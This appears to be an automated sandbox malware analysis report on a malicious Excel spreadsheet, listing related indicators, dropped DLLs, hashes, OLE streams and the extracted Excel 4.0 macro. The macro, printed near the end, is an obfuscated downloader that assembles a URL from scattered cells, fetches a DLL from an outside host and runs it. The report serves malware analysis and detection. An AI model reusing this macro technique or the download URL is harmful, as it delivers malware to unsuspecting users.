Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.64.90.137, 2.20.142.210, 2.20.142.209 TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, watson.microsoft.com, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.151.10	Documents_95326461_1831689059.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
otusmail.com	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	172.67.151.10
otusmail.com	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	104.21.64.132
cdn.digicertcdn.com	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	104.18.11.39
	technical sheet.doc	Get hash	malicious	Browse	104.18.11.39
	K12 samples.rtf	Get hash	malicious	Browse	104.18.10.39
	form_1664707387_1822429992.xls	Get hash	malicious	Browse	104.18.10.39
	form_1113533177_260439445.xls	Get hash	malicious	Browse	104.18.11.39
	form_867710861_1980511489.xls	Get hash	malicious	Browse	104.18.11.39
	Payment Receipt.doc	Get hash	malicious	Browse	104.18.11.39
	ATT00900.htm	Get hash	malicious	Browse	104.18.11.39
	QUOTATION.doc	Get hash	malicious	Browse	104.18.11.39
	ATT00071.doc	Get hash	malicious	Browse	104.18.10.39
	Technical Specifications.doc	Get hash	malicious	Browse	104.18.10.39
	Purchase Order Details.doc	Get hash	malicious	Browse	104.18.11.39
	SecuriteInfo.com.Exploit.Siggen3.10204.3307.xls	Get hash	malicious	Browse	104.18.11.39
	document-573042818.xls	Get hash	malicious	Browse	104.18.10.39
	document-573042818.xls	Get hash	malicious	Browse	104.18.10.39
	document-573042818.xls	Get hash	malicious	Browse	104.18.10.39
	Sample_B.exe	Get hash	malicious	Browse	104.18.10.39
	index_2021-02-17-11_45.dll	Get hash	malicious	Browse	104.18.10.39
	p4lqqCq2c2.exe	Get hash	malicious	Browse	104.18.10.39
	n26UEy3elW.exe	Get hash	malicious	Browse	104.18.11.39

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	813oo3jeWE.exe	Get hash	malicious	Browse	104.23.98.190
	4GGwmv0AJm.exe	Get hash	malicious	Browse	23.227.38.32
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	104.26.13.9
	FzDN7GfLRo.exe	Get hash	malicious	Browse	162.159.137.232
	Remittance Advice pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Yeni sipari#U015f _WJO-001, pdf.exe	Get hash	malicious	Browse	104.21.19.200
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	172.67.151.10
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	104.21.64.132
	5c542bb5_by_Libranalysis.exe	Get hash	malicious	Browse	104.21.84.93
	6a9b0000.da.dll	Get hash	malicious	Browse	104.20.184.68
	6ba90000.da.dll	Get hash	malicious	Browse	104.20.184.68
	5c542bb5_by_Libranalysis.exe	Get hash	malicious	Browse	104.21.84.93
	s.dll	Get hash	malicious	Browse	104.20.185.68
	setup-lightshot.exe	Get hash	malicious	Browse	104.23.139.12
	s.dll	Get hash	malicious	Browse	104.20.185.68
	74ed218c_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74
	Bank payment return x.exe	Get hash	malicious	Browse	104.21.19.200
	471e3984_by_Libranalysis.docx	Get hash	malicious	Browse	104.22.1.232
	SecuriteInfo.com.Trojan.GenericKD.36812138.16843.exe	Get hash	malicious	Browse	104.21.19.200
	a4.dll	Get hash	malicious	Browse	104.20.184.68

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	172.67.151.10
	471e3984_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.151.10
	presupuesto.xlsx	Get hash	malicious	Browse	172.67.151.10
	ORDER INQUIRY.doc	Get hash	malicious	Browse	172.67.151.10
	Outstanding Payment Plan.xls	Get hash	malicious	Browse	172.67.151.10
	SecuriteInfo.com.Heur.3869.xls	Get hash	malicious	Browse	172.67.151.10
	SecuriteInfo.com.Heur.12433.xls	Get hash	malicious	Browse	172.67.151.10
	Documents_1906038956_974385067.xls	Get hash	malicious	Browse	172.67.151.10
	SecuriteInfo.com.Heur.3421.xls	Get hash	malicious	Browse	172.67.151.10
	diagram-586750002.xlsm	Get hash	malicious	Browse	172.67.151.10
	94a5cd81_by_Libranalysis.xls	Get hash	malicious	Browse	172.67.151.10
	Documents_585904356_2104184844.xls	Get hash	malicious	Browse	172.67.151.10
	e9251e1f_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.151.10
	statistic-1048881972.xlsm	Get hash	malicious	Browse	172.67.151.10
	Specificatiile produsului.xlsx	Get hash	malicious	Browse	172.67.151.10
	be1aca64_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.151.10
	f.xlsm	Get hash	malicious	Browse	172.67.151.10
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	172.67.151.10
	db7db588_by_Libranalysis.xls	Get hash	malicious	Browse	172.67.151.10
	statistic-118970052.xlsm	Get hash	malicious	Browse	172.67.151.10

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll	Documents_95326461_1831689059.xls	Get hash	malicious	Browse
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse
C:\Users\user\bsdnbsej.dbw	Documents_95326461_1831689059.xls	Get hash	malicious	Browse
C:\Users\user\bsdnbsej.dbw	Documents_95326461_1831689059.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	525312
Entropy (8bit):	5.949946336029269
Encrypted:	false
SSDEEP:	12288:ga6g2O+gAaY9cc40TeAjaRoA5FZuY+F4:gZlOBAaY9RCy05FZuYq
MD5:	B80F4B91C29963DF1CFD0D0A8A30E5C6
SHA1:	09C6AE06E0C10672D91F6850118F41DC3DD66E72
SHA-256:	0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
SHA-512:	BDCD3009ED3499055CF73EF1C4DD4BD0942C8B81C395CECF3C9DA790E4867055059D10B05451476D7DA98BBBF472C40536E7A09158B5DE92C57A74E36396D10C
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 4%, Browse Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://otusmail.com/b/vegas.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f].5].5].5C.45M.5C."5..5T.25Z.5].5..5C.%5A.5C.35\.5C.55\.5C.05\.5Rich].5........PE..L......`...........!.....................................................................@.........................@...T...<...P.......x.......................d.......................................@...............<............................text............................... ..`.data...d...........................@....rsrc...x...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\06CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	97222
Entropy (8bit):	7.896549073080212
Encrypted:	false
SSDEEP:	1536:j+mgXtzCN/ynI4rIEOzU2mSBPDa6pDwoXAeWvie2HWCWGHKlMVGoIahaDHTU6hr2:j+mgXGOOja6pDdAizWCW2K2sTU2yF70G
MD5:	1E43FD6E398F93C94ADF8E5CFF45C20D
SHA1:	26C23AF451A038A2EE913ABEF7C9A1C927EADF1C
SHA-256:	5C6DBC086D408DBCAC36F5E1C193BF910B3E5BC4AFD591CF34C618DE86CCA954
SHA-512:	2392B4240A505A98AF903B64947B1307B0B4217DFCFD7E1F35B18DCD50EA4A2CC629A9CCE7A52833BCAF2CFC17B45B781FF16DA7381D12E35D8FA35A81770E6B
Malicious:	false
Reputation:	low
Preview:	.U.n.0....?......(..r.Y.m.....#.07p.D.....$.j..^..\|...3.N...<JkjrV-H..[!.&..n.....`......\.>~X.m.`...k..Q......L.i..,._.....[.=_,.PnM...8.jy..{P......3kR\..%..H..i.."@7...L;.....@.9%9.1....X.>.*"..l..O1.?(...q...q?b...P.2..3.....O.o..T.I.K.%t.T.-@.4..^.v. .1i...P.H..u6C.m.K.4....A..V.<0...R$..H....G._..i.........2...A....O(.yF..Nn(~...(....bs.....f.....pF^..vG:..2..g....k.....d.....{O4...m.{'N..{H?..[o..1..x...&.K..........b.-...unHCX...y.~.......PK..........!........5.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 07:06:36 2021, atime=Tue May 4 07:06:36 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.471309463237221
Encrypted:	false
SSDEEP:	12:85QdG0LgXg/XAlCPCHaXgzB8IB/LmX+WnicvbGCd+bDtZ3YilMMEpxRljKBwTdJU:85c/XTwz6I0YeiCkDv3qy8rNru/
MD5:	F3BDD3EC77361AB1607A7DDBCED8B5E8
SHA1:	D7EFD5485B077A9756FB88096DD9DEDF57F2D253
SHA-256:	6FB11E32AD6BBAAFB9C3DDB4E0322434AE5B2AB06B9C65F11225BF1F21805E14
SHA-512:	CE6C7FC58E16FD0DE0CB439C10F9AE00ABA17E1511BFA7CEE6761D8FD989FB9F3E1EB827C33EE93A77770B650250284193B229C63CD9F3AFDD9C9F339C92B013
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G..p.Fg.@..p.Fg.@...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......R.@..Desktop.d......QK.X.R.@..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\247525\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......247525..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_111651917_375818984.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Tue May 4 07:06:36 2021, atime=Tue May 4 07:06:36 2021, length=123904, window=hide
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	4.509927331022281
Encrypted:	false
SSDEEP:	48:8jZ/XT3InYTHldT43Qh2jZ/XT3InYTHldT43Q/:8jZ/XLInYBW3Qh2jZ/XLInYBW3Q/
MD5:	79E36205440F5AEF5CBD8240018C273F
SHA1:	B81034A207F521E242876EE90F737BA8D3DDD27E
SHA-256:	FC7F597B347BB7B5D1C416AE092C6C12008397920E16E6AED3D8A13658686632
SHA-512:	3D877E5250103CBA8881C9430659939B1A37BAA55001110BB79745D9CFDFFF885ACD683B9CF80AFF91444A9A3D42A0961F50EC13F779270F5F86045D9CE26228
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...G....{..p.Fg.@...@Mg.@...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.@ .DOCUME~1.XLS..p.......Q.y.Q.y...8.....................D.o.c.u.m.e.n.t.s._.1.1.1.6.5.1.9.1.7._.3.7.5.8.1.8.9.8.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\247525\Users.user\Desktop\Documents_111651917_375818984.xls.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s._.1.1.1.6.5.1.9.1.7._.3.7.5.8.1.8.9.8.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	140
Entropy (8bit):	4.747564355627999
Encrypted:	false
SSDEEP:	3:oyBVomMU9UjaWedPFo5S/9UjaWedPFomMU9UjaWedPFov:dj6CUXCPFySlUXCPF6CUXCPFy
MD5:	F76CD1EBA58FCA55D502A3D2D9E0E110
SHA1:	661819A3CAAC115DA23D3461C097EAE0E4C4053A
SHA-256:	C8BD2E44E413B9A30E0EA6167F7E597C5FC6FE5FFCDBA3BE4281F75FB4469EF9
SHA-512:	A6298F269F1C478402C91EDD92CF8602CFB87F74D0C6061B9D8FDA33B5EBC43E498717E0F7D7125AA894C810D491470661A3F1F79A7E5F09921944F29BF955CF
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..Documents_111651917_375818984.LNK=0..Documents_111651917_375818984.LNK=0..[xls]..Documents_111651917_375818984.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VPKC7C2S.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	114
Entropy (8bit):	4.352150128673656
Encrypted:	false
SSDEEP:	3:GmM/RVlG6XBW5BWQENMVWEQSRQPHKKvcSNZPVtr5WX9W3pN:XM/RVlG8BW5BWfNcWEHQSKE8n1WWT
MD5:	598719AFC850C98FF8479B25D2462E86
SHA1:	89F092A8F99BFD924DF82DBB18B07520020204E8
SHA-256:	067F314B53BD4647CF5358C30D7C37F89B03775B2E5F3EAF5D3DBC1A71B2C5E0
SHA-512:	64989B7817A46FE7B99A4EE29C9068E91078C0C4E1240044ACC4E14964B5620A9846BF3E6C860D9539E6253C83210392B44FB98CF8024B39E6ECEB18BBBB3ABF
Malicious:	false
Reputation:	low
IE Cache URL:	otusmail.com/
Preview:	__cfduid.d5a0dc5c492d81497d4a020c524bcc6f41620083185.otusmail.com/.9728.3911134848.30889987.1742632066.30884028.*.

C:\Users\user\Desktop\C6CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	178930
Entropy (8bit):	6.290384078644883
Encrypted:	false
SSDEEP:	3072:Gu8rmjAItyzElBIL6lECbgBGGP5xLm7Tm2nTUSyF70Si6W23nWknWju8rmjAItyy:P8rmjAItyzElBIL6lECbgBvP5Nm7ThU7
MD5:	214AADA5151FAB2EAC3A67A2F71DBC82
SHA1:	B2ABC5A3A40EC1F7795A4D8FA0B638F5912576A9
SHA-256:	A81A24B24A01D277493675A5D37C94AF1CBBE2A8DB373013641504F7BE4D8413
SHA-512:	C0B258D8B1CF719302FCD8859C5EA6F74F504AAC80A1EFA582A86C1298E3D0AFCF85109CAD04B8A3E1E7EDDEA6E579624A30E39125195EFA7314BECFB3FCEE8A
Malicious:	false
Reputation:	low
Preview:	........g2..........................\.p....user B.....a.........=...................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......

C:\Users\user\bsdnbsej.dbw Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	525312
Entropy (8bit):	5.949946336029269
Encrypted:	false
SSDEEP:	12288:ga6g2O+gAaY9cc40TeAjaRoA5FZuY+F4:gZlOBAaY9RCy05FZuYq
MD5:	B80F4B91C29963DF1CFD0D0A8A30E5C6
SHA1:	09C6AE06E0C10672D91F6850118F41DC3DD66E72
SHA-256:	0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
SHA-512:	BDCD3009ED3499055CF73EF1C4DD4BD0942C8B81C395CECF3C9DA790E4867055059D10B05451476D7DA98BBBF472C40536E7A09158B5DE92C57A74E36396D10C
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 4%, Browse Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f].5].5].5C.45M.5C."5..5T.25Z.5].5..5C.%5A.5C.35\.5C.55\.5C.05\.5Rich].5........PE..L......`...........!.....................................................................@.........................@...T...<...P.......x.......................d.......................................@...............<............................text............................... ..`.data...d...........................@....rsrc...x...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 3 14:24:59 2021, Security: 0
Entropy (8bit):	3.330043919784793
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	Documents_111651917_375818984.xls
File size:	300032
MD5:	72526a505496a9b7da9a6c9651dbda5e
SHA1:	84cf963666314eee0d8ad1ef09e5462a66e3ccbf
SHA256:	3c20530c13d6736ec705786d1694052b2abf42bf87d3bbc359ea95b343fcf681
SHA512:	ca1ac0057d9ede44a1d9ecf9f854140a39b9b626895c85f34fbf973b8ee749fa2fbd836bc882e9ca2fab7929a9aecb790d7e795ea55a32ce66d6ee1d078afe46
SSDEEP:	6144:KcPiTQAVW/89BQnmlcGvgZ7r3J8b5IPJK++3ey:uqy
File Content Preview:	........................>.......................H...........................C...D...E...F...G..................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Documents_111651917_375818984.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Last Saved By:	5
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-05-03 13:24:59
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.338488976625
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.247889866731
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 288088

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	288088
Entropy:	3.3163372394
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 3 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X
Data Raw:	09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

"=EXEC(Sheet2!BS64&Sheet2!BW70&Sheet2!BW71&Sheet2!BT63&Sheet2!BT64&Sheet2!BT65&Sheet2!BT66)=RUN(Sheet2!BI14)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)"

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,otusmail.com/b/vegas.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bsdnbsej.dbw,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,JJ,run,",Plu",,,,,,,,,,,,,,,,,,,,,,,,